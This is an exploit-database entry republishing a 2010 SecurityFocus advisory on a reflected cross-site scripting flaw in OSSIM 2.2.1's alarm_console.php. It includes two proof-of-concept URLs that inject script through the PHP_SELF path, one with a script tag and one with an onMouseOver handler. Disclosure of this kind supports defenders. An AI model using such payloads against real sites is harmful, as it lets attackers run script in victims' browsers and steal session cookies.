OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Cross-Site Scripting



EKU-ID: 38615 CVE: OSVDB-ID:
Author: CONIX Security Published: 2010-03-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/39145/info

OSSIM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

OSSIM 2.2.1 is vulnerable; other versions may also be affected.

http://www.example.com/ossim/control_panel/alarm_console.php/"><script>alert('xss')</script>
http://www.example.com/ossim/control_panel/alarm_console.php/')"%20onMouseOver="alert('xss');//